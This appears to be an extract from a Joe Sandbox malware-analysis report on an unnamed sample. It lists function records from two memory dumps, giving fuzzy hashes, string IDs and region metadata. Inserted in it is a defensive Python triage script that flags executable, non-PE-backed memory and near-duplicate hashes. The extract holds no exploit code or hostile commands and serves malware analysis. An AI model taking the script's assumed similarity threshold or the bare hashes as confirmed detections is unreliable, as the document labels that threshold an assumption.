                                                                                    • Instruction ID: ff81ec783fb5dee9fd79db594badab287fe13ff5dd25e78d3fc0514d9b543678
                                                                                    • Opcode Fuzzy Hash: a485c2cbdf1a590b137cdc61b6b468d38dcb171cd72c2d8045729b0fbdc12bf5
                                                                                    • Instruction Fuzzy Hash: 76A10574D00208CFEB14DFA8C948B9DBBB1FF88300F209269E419A7291DB759A85CF64
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1453e7dd872fecc8d5316a6ecd36185a38956a53db159633a1064697b8fc2eb1
                                                                                    • Instruction ID: c9dd1b16473783f6a093c35cbc9534bb845abe5fa004321d5b31ec7d3f4ff027
                                                                                    • Opcode Fuzzy Hash: 1453e7dd872fecc8d5316a6ecd36185a38956a53db159633a1064697b8fc2eb1
                                                                                    • Instruction Fuzzy Hash: C5A19374E01218CFEB68CF6AC944B9DBBF2BB89300F14C1A9D408A7294DB745A85CF65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 80fcbdd56f51655fd248b965375396715c96b5d3d55e50e75ffa0809e93fae4b
                                                                                    • Instruction ID: fb6394d004f56c89300e0d5aa8b38bf9b71b12ba83b3439a7495154ce7e1cc3e
                                                                                    • Opcode Fuzzy Hash: 80fcbdd56f51655fd248b965375396715c96b5d3d55e50e75ffa0809e93fae4b
                                                                                    • Instruction Fuzzy Hash: EC910474D00218CFEB50DFA8C848B9CBBF1FF49314F209269E419A7292DB759A85CF64
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 84de80b3be2275148e37a94c91fc736319719a03034d548a9fbe1b0bcb33528d
                                                                                    • Instruction ID: a4630e9b37726a94f73bcd6936df459a39ea4c3ee0698a8d62820d7d4816b774
                                                                                    • Opcode Fuzzy Hash: 84de80b3be2275148e37a94c91fc736319719a03034d548a9fbe1b0bcb33528d
                                                                                    • Instruction Fuzzy Hash: E97184B5E01618CFEB68CF6AC954B9EBBF2BF89300F14C1A9D408A7254DB745A85CF10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a8016b285e590cabdbb62c0bf243e3272b0aa459b41f45272c0b0fd7fd87644a
                                                                                    • Instruction ID: 091374599fa0ddb212d5b3d3cd3970af1a2c6b1959bf969f641b241c9151b3e8
                                                                                    • Opcode Fuzzy Hash: a8016b285e590cabdbb62c0bf243e3272b0aa459b41f45272c0b0fd7fd87644a
                                                                                    • Instruction Fuzzy Hash: 9051A574E00208DFDB18DFB6D594A9DBBB2FF89300F249129E815AB364DB315842CF14
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5dd1ff30b7075c1b3e6eabd08b18e70addaf9e80f1e6bcc27b6b218903cbb09b
                                                                                    • Instruction ID: 533f95b6bd2270f5106b20d791c811f843f215fb6e8b77010f9d0068a86332c9
                                                                                    • Opcode Fuzzy Hash: 5dd1ff30b7075c1b3e6eabd08b18e70addaf9e80f1e6bcc27b6b218903cbb09b
                                                                                    • Instruction Fuzzy Hash: EB518474E00308DFDB18DFA6D594A9DBBB2BF89300F249129E819BB364DB316942CF54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ba187e7ff0d489c59383f965c1d860903f3d47e1228cc9c67a3b34498058e4d
                                                                                    • Instruction ID: d448f12bcf6a58b06eb5128937b500e9577eedacf45f34127a680beac641ca55
                                                                                    • Opcode Fuzzy Hash: 5ba187e7ff0d489c59383f965c1d860903f3d47e1228cc9c67a3b34498058e4d
                                                                                    • Instruction Fuzzy Hash: 99416A71E016188BEB58CF5BD9547DEFAF3AFC9300F14C1A9C40CA6264EB7409858F51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f5f464be10d5ec637d97291a08dbe71fd4b36a26a9d7a9b400114a2d8edc0cd9
                                                                                    • Instruction ID: 01e9dc6b40b7c56ded60b866debc6e2134431e4e6b9c281ee1cc827f88a3f6ac
                                                                                    • Opcode Fuzzy Hash: f5f464be10d5ec637d97291a08dbe71fd4b36a26a9d7a9b400114a2d8edc0cd9
                                                                                    • Instruction Fuzzy Hash: 7A410274E00248DFEB18CFEAD4546ADBBF2AF89300F24D029D418BB294DB344946CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dd365adbf10c7b4d4d5d4d5a11a515f2e9db08a423937a533ee65d6f63966c84
                                                                                    • Instruction ID: 45f5e9f0a6117f71e424953afe52d65263f3f3b63f93452f84481e7b1c6200c5
                                                                                    • Opcode Fuzzy Hash: dd365adbf10c7b4d4d5d4d5a11a515f2e9db08a423937a533ee65d6f63966c84
                                                                                    • Instruction Fuzzy Hash: DD41D375D01208CBEB58DFAAD9546ADBBF2BF89300F24C129C418BB2A4EB345945CF64

                                                                                    Control-flow Graph: function at 0xEC76F1 (basic blocks span 0xEC76F1-0xEC7CBC; calls to 0xEC7538, 0xEC80C9/0xEC80D8 and 0xEC63E0 appear in the graph). The rendered graph and its executed/not-executed colouring are not preserved here.
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                    • API String ID: 0-2212926057
                                                                                    • Opcode ID: c09ffee4403244378fc4e82218a96fc3cdb804f5eb452cd80070fa64dbdf5c52
                                                                                    • Instruction ID: df039416fecfa9158ccd83348b6d61a9058e3bfe538db4f35a71032f27a70a8c
                                                                                    • Opcode Fuzzy Hash: c09ffee4403244378fc4e82218a96fc3cdb804f5eb452cd80070fa64dbdf5c52
                                                                                    • Instruction Fuzzy Hash: 82123930A042099FCB24CF69DA84E9EBBF2EF49314F149559E895AB261D732ED42CF50

                                                                                    Control-flow Graph: function at 0xEC8490 (basic blocks span 0xEC8490-0xEC9031; no call targets appear in the graph). The rendered graph and its executed/not-executed colouring are not preserved here.
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $q$$q
                                                                                    • API String ID: 0-3126353813
                                                                                    • Opcode ID: 68f302170314eb51491af4c18226e4254a41d8689cbdb87ba9a8641f0a2195c6
                                                                                    • Instruction ID: 3824a7966c252870b91c15a45322545196bc93547ddfccd02b1d67a781a89ac0
                                                                                    • Opcode Fuzzy Hash: 68f302170314eb51491af4c18226e4254a41d8689cbdb87ba9a8641f0a2195c6
                                                                                    • Instruction Fuzzy Hash: 7C52E134A00218CFEB24DBA4C950B9EBB73EF98304F1081ADD10AAB765DF355E469F61

                                                                                    Control-flow Graph: function at 0xEC5F38 (basic blocks span 0xEC5F38-0xEC62EC; calls to 0xEC5F38 itself or 0xEC5F2A, 0xEC69A0, 0xECAFAD/0xECAEBA/0xECAEF0 and 0xEC62F0/0xEC6300 appear in the graph). The rendered graph and its executed/not-executed colouring are not preserved here.
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Hq$Hq
                                                                                    • API String ID: 0-925789375
                                                                                    • Opcode ID: bf45bf2d44994ab322ffb044804184b084749fe2c76ede19f813a02d361a3d91
                                                                                    • Instruction ID: a86fada9c9fd93937d74202fa8d864b3f5d4abb9f4bd96f49d0f61a05f6a9fd9
                                                                                    • Opcode Fuzzy Hash: bf45bf2d44994ab322ffb044804184b084749fe2c76ede19f813a02d361a3d91
                                                                                    • Instruction Fuzzy Hash: 01B1DF307046148FDB299F34D954B6F7BA2AF88314F18952DE906DB3A1DB36CC42E7A1

                                                                                    Control-flow Graph: function at 0xEC6498 (basic blocks span 0xEC6498-0xEC6736; no call targets appear in the graph). The rendered graph and its executed/not-executed colouring are not preserved here.
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,q$,q
                                                                                    • API String ID: 0-1667412543
                                                                                    • Opcode ID: 64ac8eb1c4705fc282050ded5e6c7d21a581276dd3f1ffc4ff2ff6896f7807f9
                                                                                    • Instruction ID: 30471cf9e223261d1b4357dc1b2b5c7dd748d02cd98a14acb6b34c2ed4828680
                                                                                    • Opcode Fuzzy Hash: 64ac8eb1c4705fc282050ded5e6c7d21a581276dd3f1ffc4ff2ff6896f7807f9
                                                                                    • Instruction Fuzzy Hash: 09817D34A00505DFCB14CF69C684EAABBF2BF89318B24956DD415EB365DB32EC42CB61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (oq$(oq
                                                                                    • API String ID: 0-1396055846
                                                                                    • Opcode ID: c5eaf7209964f9afa3947564ab05ac129b6f87c6abcd6f8f7d72ab61928c1bf9
                                                                                    • Instruction ID: 2791389b34b4f448c8c2fe67634112b89fa5b585ecd98df868f54c35f8d15e3a
                                                                                    • Opcode Fuzzy Hash: c5eaf7209964f9afa3947564ab05ac129b6f87c6abcd6f8f7d72ab61928c1bf9
                                                                                    • Instruction Fuzzy Hash: DD41D331B042088FC7159B74A955BAE7BF2EFC9314B18506DE516EB2A1DB368C03DB61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'q$4'q
                                                                                    • API String ID: 0-1467158625
                                                                                    • Opcode ID: 87e04496bcb2808b4c3fd2a00c645f963b01a7c43adcc031d832df012f297c25
                                                                                    • Instruction ID: 9dec0d78fd6b49d67fc190a7344468228b795dcd7999db116275341e7cb4d50e
                                                                                    • Opcode Fuzzy Hash: 87e04496bcb2808b4c3fd2a00c645f963b01a7c43adcc031d832df012f297c25
                                                                                    • Instruction Fuzzy Hash: A0F0CD353002046FD7081BA6A854B7BBBCBEFCC3A1B148029B94AD7351DE72CC0283D0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRq
                                                                                    • API String ID: 0-3187445251
                                                                                    • Opcode ID: 973c734886a17f6749a7969b14b0bba87bbbe965fb0f5013aa37010c56096b55
                                                                                    • Instruction ID: 3db45cefdffbc5f63fc3316f6c7c86945e11c5addc87ea04262fbe7f1af87adc
                                                                                    • Opcode Fuzzy Hash: 973c734886a17f6749a7969b14b0bba87bbbe965fb0f5013aa37010c56096b55
                                                                                    • Instruction Fuzzy Hash: DE52AA78901219CFCB64EF64ED94B9EBBB2FB48301F1085A9D409A7369DB706D86CF50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRq
                                                                                    • API String ID: 0-3187445251
                                                                                    • Opcode ID: 1170a8f9dff9fee61c7a4de5e41c2d5829c2ab51a8c743816726e02138e0b090
                                                                                    • Instruction ID: 1c09de9d8d5136283b9b22e129f1a2688ced2d8e1f1619814921f1bfaeda4755
                                                                                    • Opcode Fuzzy Hash: 1170a8f9dff9fee61c7a4de5e41c2d5829c2ab51a8c743816726e02138e0b090
                                                                                    • Instruction Fuzzy Hash: 4652BB78901219CFCB64EF64ED94B9EBBB2FB48301F1085A9D409A7369DB706D86CF50
                                                                                    APIs
                                                                                    • LdrInitializeThunk.NTDLL(00000000), ref: 06708BAE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 1d5bf26d7219ff86f7862a57dbf1197ea4aac05f898028ab08eaef5eea428de5
                                                                                    • Instruction ID: 58a4f686e219c941dd7e328d0b73c18d2e476a29dbdd353997e0e761d9767105
                                                                                    • Opcode Fuzzy Hash: 1d5bf26d7219ff86f7862a57dbf1197ea4aac05f898028ab08eaef5eea428de5
                                                                                    • Instruction Fuzzy Hash: BB115CB8E00209CFEB44DBA8D884AADBBF5FF88314F148165E844E7381D671DD41CB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 85f25894b55df1709df0302fc8819237ea3a43920293c07e66130574f35bf8bf
                                                                                    • Instruction ID: a9555d3356f77c9fead3c13454e537a37af40e03d1fe2edbfcdd771d5149838e
                                                                                    • Opcode Fuzzy Hash: 85f25894b55df1709df0302fc8819237ea3a43920293c07e66130574f35bf8bf
                                                                                    • Instruction Fuzzy Hash: B512997582174BCFD6406B30FAAD2AABA62FF5F3373056C20F45BC01A5DB754489AB21
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0eff975730f97eceaea0f40a0bc12ff39b5022c3dd5ee31beadb8c12175188b2
                                                                                    • Instruction ID: c3b9f842663eda338314a11d4cbd228505ca6e3fe5b6d9078ed2b7df95ed261f
                                                                                    • Opcode Fuzzy Hash: 0eff975730f97eceaea0f40a0bc12ff39b5022c3dd5ee31beadb8c12175188b2
                                                                                    • Instruction Fuzzy Hash: F112997582174BCFD6402B30FAAD2AEBA62FF5F3373056C10F45BC01A5DB754489AA61
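                                                                                    The per-function records above (Source File, Offset, based on PE, Instruction Fuzzy Hash) are what a triage script consumes when it has many such reports to compare. The following is an added example, not code from the Joe Sandbox report or from Joe Security's tooling: it parses a handful of records copied from this page, decodes the dot-separated dump-file name under the assumed layout "pid.state.id.base.protection.unknown.alloc-type.unknown.sdmp" (the base field is cross-checked against the printed Offset, which the page does support; the protection and allocation-type positions are assumptions), flags regions that are PAGE_EXECUTE_READWRITE and not backed by a PE image, and pairs records whose instruction fuzzy hashes differ in only a few hex digits. The hex-digit distance and its threshold are a stand-in for whatever similarity measure the sandbox uses, which the page does not describe.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Windows memory constants from winnt.h.
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000

# Constructed sample: five record fragments copied from this report section
# (only the Source File and Instruction Fuzzy Hash lines; everything else omitted).
SAMPLE = """
• Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
• Instruction Fuzzy Hash: DE52AA78901219CFCB64EF64ED94B9EBBB2FB48301F1085A9D409A7369DB706D86CF50
• Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
• Instruction Fuzzy Hash: 4652BB78901219CFCB64EF64ED94B9EBBB2FB48301F1085A9D409A7369DB706D86CF50
• Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
• Instruction Fuzzy Hash: BB115CB8E00209CFEB44DBA8D884AADBBF5FF88314F148165E844E7381D671DD41CB61
• Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
• Instruction Fuzzy Hash: B512997582174BCFD6406B30FAAD2AABA62FF5F3373056C20F45BC01A5DB754489AB21
• Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
• Instruction Fuzzy Hash: F112997582174BCFD6402B30FAAD2AEBA62FF5F3373056C10F45BC01A5DB754489AA61
"""

SRC_RE = re.compile(
    r"Source File:\s*(?P<name>[0-9A-Fa-f.]+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)", re.I)
HASH_RE = re.compile(r"Instruction Fuzzy Hash:\s*(?P<h>[0-9A-Fa-f]+)")


@dataclass
class Record:
    dump_name: str
    base: int         # assumed: 4th dot-separated field (matches the printed Offset)
    protect: int      # assumed: 5th field, a PAGE_* protection constant
    alloc_type: int   # assumed: 7th field, a MEM_* allocation-type constant
    offset: int       # "Offset:" exactly as printed in the report
    pe_backed: bool   # "based on PE"
    fuzzy: str        # Instruction Fuzzy Hash, upper-case hex


def parse_records(text: str) -> List[Record]:
    """Pair every 'Source File' line with the next 'Instruction Fuzzy Hash' line."""
    records: List[Record] = []
    pending = None
    for line in text.splitlines():
        m = SRC_RE.search(line)
        if m:
            pending = m
            continue
        h = HASH_RE.search(line)
        if h and pending is not None:
            name = pending.group("name")
            fields = [int(f, 16) for f in name[:-len(".sdmp")].split(".")]
            records.append(Record(
                dump_name=name,
                base=fields[3],
                protect=fields[4],
                alloc_type=fields[6],
                offset=int(pending.group("off"), 16),
                pe_backed=pending.group("pe").lower() == "true",
                fuzzy=h.group("h").upper(),
            ))
            pending = None
    return records


def is_unbacked_rwx(rec: Record) -> bool:
    """Writable+executable memory with no PE image behind it is the usual
    footprint of unpacked or injected code rather than a loaded module."""
    return rec.protect == PAGE_EXECUTE_READWRITE and not rec.pe_backed


def nibble_distance(a: str, b: str) -> Optional[int]:
    """Count differing hex digits; None when the hashes have different lengths."""
    if len(a) != len(b):
        return None
    return sum(1 for x, y in zip(a, b) if x != y)


def near_duplicates(records: List[Record], max_diff: int = 8) -> List[Tuple[int, int, int]]:
    """Index pairs whose fuzzy hashes differ in at most max_diff digits.
    The threshold is an assumption chosen for this example, not a documented value."""
    out: List[Tuple[int, int, int]] = []
    for i in range(len(records)):
        for j in range(i + 1, len(records)):
            d = nibble_distance(records[i].fuzzy, records[j].fuzzy)
            if d is not None and d <= max_diff:
                out.append((i, j, d))
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        flag = "UNBACKED RWX" if is_unbacked_rwx(r) else ""
        private = "MEM_PRIVATE" if r.alloc_type == MEM_PRIVATE else f"type=0x{r.alloc_type:X}"
        print(f"base={r.base:08X} offset={r.offset:08X} prot=0x{r.protect:02X} {private} {flag}")
    for i, j, d in near_duplicates(recs):
        print(f"records {i} and {j}: fuzzy hashes differ in {d} hex digits")
```

                                                                                    Run against the five records above, both 0xEC0000 and 0x6700000 regions come out as RWX and not PE-backed, and the two pairs of records that share a body but differ in their leading bytes (the LRq pair and the two records following the LdrInitializeThunk entry) are reported as near-duplicates, which is the usual sign of the same function reached through two slightly different dump offsets.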
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26a4752af228af352b1de7d4b5682228bfee2944deb5e99202046bb54a8b9c66
                                                                                    • Instruction ID: a1b90535f1f86124ad1fb81f910f348ea48aad2375196278d20819c94075c953
                                                                                    • Opcode Fuzzy Hash: 26a4752af228af352b1de7d4b5682228bfee2944deb5e99202046bb54a8b9c66
                                                                                    • Instruction Fuzzy Hash: 78713E347005058FCB19DF68CB98FAA7BE6AF59714B1910AAE801EB371DB72DC42CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0fe5e16f4f79355618a54c45c989f08635bb43e1391b044c0a74112ce7784a73
                                                                                    • Instruction ID: b963c83b14147464b4d935903ada87ee55a0ece8a33275036ac28f9e553b816b
                                                                                    • Opcode Fuzzy Hash: 0fe5e16f4f79355618a54c45c989f08635bb43e1391b044c0a74112ce7784a73
                                                                                    • Instruction Fuzzy Hash: 7A612174D00318CFDB24DFA4D954BAEBBB2FF88301F208129D806AB295DB356A46CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 67435593d14a7396b670c1fa394aec94c8fb62d87cdec8ede12323dab4ff0131
                                                                                    • Instruction ID: 30b6419c64cb3c8b59271f1e6afa121c12a095632fb314800c17f2db6a45c9ff
                                                                                    • Opcode Fuzzy Hash: 67435593d14a7396b670c1fa394aec94c8fb62d87cdec8ede12323dab4ff0131
                                                                                    • Instruction Fuzzy Hash: C8518474E01218DFDB44DFA9D984A9DBBF2FF89310F248169E809AB364DB31A941CF54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cd6188c262152e553f64033f6130f5966ec1710ba0d7ae25e02c1b9b28b5182d
                                                                                    • Instruction ID: bb16c8cd568d8b8ee3713b7c83be55bfb47cfd2df691b2f3083935edb70c816e
                                                                                    • Opcode Fuzzy Hash: cd6188c262152e553f64033f6130f5966ec1710ba0d7ae25e02c1b9b28b5182d
                                                                                    • Instruction Fuzzy Hash: E8516F74E01308DFCB08DFA9D594A9DBBF2FF89310B209469E815AB365DB35A842CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e638c78ce0d54b94b75620dcd446d400a7b3364eca7244ed089af3726a6e0cf8
                                                                                    • Instruction ID: 82253ce314edcd4cf543460a96b541bad3e9bfca5db863924a005326371dcd7c
                                                                                    • Opcode Fuzzy Hash: e638c78ce0d54b94b75620dcd446d400a7b3364eca7244ed089af3726a6e0cf8
